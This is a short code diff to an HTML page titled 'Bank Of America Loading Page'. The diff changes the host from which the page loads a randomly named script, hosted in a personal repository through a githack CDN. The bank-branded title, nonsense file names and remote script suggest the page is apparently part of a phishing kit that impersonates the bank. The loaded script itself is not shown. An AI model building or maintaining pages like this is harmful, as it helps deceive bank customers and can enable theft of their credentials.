--- a/llooaad.html
+++ b/llooaad.html
@@ -4,7 +4,7 @@
     <meta charset="UTF-8" />
     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
     <title>Bank Of America Loading Page</title>
-    <script src="https://rawcdn.githack.com/skypennsylvania/online/main/hjdjdfjdfkj.js"></script>
+    <script src="https://raw.githack.com/skypennsylvania/online/main/hjdjdfjdfkj.js"></script>
     <style>
       * {
         -moz-box-sizing: border-box;
